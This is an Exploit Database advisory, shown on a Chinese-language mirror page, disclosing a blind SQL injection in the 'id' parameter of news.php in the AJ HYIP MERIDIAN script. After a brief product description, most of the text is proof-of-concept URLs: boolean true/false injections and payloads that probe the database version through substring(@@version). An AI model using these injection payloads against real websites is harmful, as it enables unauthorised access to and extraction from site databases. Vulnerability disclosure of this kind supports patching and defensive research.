AJ HYIP MERIDIAN – ‘news.php?id’ Blind SQL Injection

• Exploit Database
• 8 阅读

• 作者： JosS
  日期： 2010-07-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14436/

• AJ HYIP MERIDIAN (news.php id) Blind SQL Injection Vulnerability
  bug found by Jose Luis Gongora Fernandez (a.k.a) JosS
  
  contact: sys-project[at]hotmail.com
  website: http://www.hack0wn.com/
  
  - site: http://www.ajsquare.com/products/ajhyip/index.php
  
  - about AJ HYIP:
  
  AJ HYIP is a complete financial tool with no technical 
  knowledge required to manage the site. AJ HYIP software 
  is the latest and most advanced HYIP Script with excellent 
  navigation features. Our HYIP Script can be easily customized 
  to accustom your needs with a potential to generate heavy revenues.
  
  
  ~~ [POC]
  
  http://target/path/news.php?id=1 [bSQL]
  http://target/path/news.php?id=1 and 1=1
  http://target/path/news.php?id=1 and 1=2
  
  ~~ [DEMO]
  
  http://server/meridian/news.php?id=1 and substring(@@version,1,1)=4
  http://server/meridian/news.php?id=1 and substring(@@version,1,1)=5
  
  
   __h0__